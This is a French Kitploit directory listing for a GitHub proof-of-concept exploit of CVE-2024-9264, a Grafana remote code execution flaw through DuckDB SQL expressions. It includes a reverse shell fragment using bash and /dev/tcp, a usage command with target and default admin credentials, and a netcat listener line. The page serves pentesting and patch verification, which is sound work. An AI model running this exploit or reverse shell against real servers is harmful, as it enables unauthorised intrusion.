Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264-Fixed — Preuve de concept corrigée pour l'exploit CVE-2024-9264, une RCE critique de Grafana via des expressions SQL DuckDB. Exécute un reverse shell en utilisant l'extension corrigée shellfs et la fonction writefile(). | Kitploit
Outils/GitHubGitHub/exerrdev/cve-2024-9264-fixed
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

Preuve de concept corrigée pour l'exploit CVE-2024-9264, une RCE critique de Grafana via des expressions SQL DuckDB. Exécute un reverse shell en utilisant l'extension corrigée shellfs et la fonction writefile().

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

🛠️ CVE-2024-9264 - Exploit RCE Grafana corrigé

Ceci est une version corrigée de la preuve de concept de l'exploit pour CVE-2024-9264, une vulnérabilité critique d'exécution de code à distance dans Grafana (via les expressions SQL et DuckDB).

🔗 Avis original : Publication de sécurité de Grafana
❌ PoC original : Cassé à cause d'erreurs de syntaxe et d'une utilisation incorrecte de write_file()
✅ Cette version fonctionne, testée sur une instance vulnérable de Grafana 11.0.0.


✅ Corrections dans cette version

  • ✅ Utilise correctement writefile() au lieu de write_file() (fonction DuckDB)
  • ✅ Charge utile shell appropriée utilisant bash -i >& /dev/tcp/...
  • ✅ Shell inverse écrit et exécuté avec succès via l'extension shellfs

📦 Prérequis

  • Instance Grafana avec :
    • Backend DuckDB
    • Capacité à install shellfs from community
  • Un écouteur netcat sur votre machine attaquante

🚀 Utilisation

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

Ensuite écoutez avec :

root@kitploit:~
nc -lvnp 4444

⚠️ Avertissement légal

Ce projet est uniquement à des fins éducatives.
Ne l'utilisez pas contre des cibles que vous n'êtes pas autorisé à tester.


✍️ Auteur de cette correction

Modifié et validé par Exerr — PoC original par z3k0sec.

Télécharger l’outil